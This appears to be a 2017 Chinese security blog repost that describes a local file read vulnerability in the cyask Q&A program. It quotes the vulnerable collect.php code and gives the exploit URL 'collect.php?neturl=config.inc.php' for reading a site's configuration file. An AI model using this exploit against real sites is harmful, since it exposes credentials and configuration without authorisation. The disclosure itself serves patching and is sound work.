cyask的一个本地读文件的漏洞利用 's

admin 2017年5月1日11:19:40评论292 views字数 690阅读2分18秒阅读模式
摘要

By:linkboy昨天在晚上看到了一个这样的文章,却没有人说利用的方法,自己研究了一下,原来这么简单。
下面是这篇文章的内容。

By:linkboy

昨天在晚上看到了一个这样的文章,却没有人说利用的方法,自己研究了一下,原来这么简单。
下面是这篇文章的内容。

下午帮同事看一个站,DZ的论坛,该补的都补了,咱也没圈day
然后逛了下有个仿百度知道的程序在上面,和DZ整合了,原以为也是Dz开发的,估计也没啥问题
下来看代码,看到collect.php

——————————-

else { /* 检查网址 */ $url=get_referer(); $neturl=empty($_POST['neturl']) ? trim($_GET['neturl']) : trim($_POST['neturl']);  $collect_url=empty($neturl) ? $url : $neturl;  $contents = ”; if([email protected]($collect_url,”r“)) { do { $data = fread($fid, 4096); if (strlen($data) == 0) { break; } $contents .= $data; } while(true); fclose($fid); } else { show_message(’collect_url_error’, ”); exit; }

———————————-
害人啊,本来还挺安全的一个站,整合个毛呃……

找一个cyask的网站,在其上面注册,然后登录后,输入http://www.×××.com/collect.php?neturl=config.inc.php 在内容快照里面点右键,点查看源文件,哇,什么都看到了,我只是说出来利用方法,希望大家尽早补漏洞。一切损失与本人无关哦!

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2017年5月1日11:19:40
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   cyask的一个本地读文件的漏洞利用 'shttps://cn-sec.com/archives/44724.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息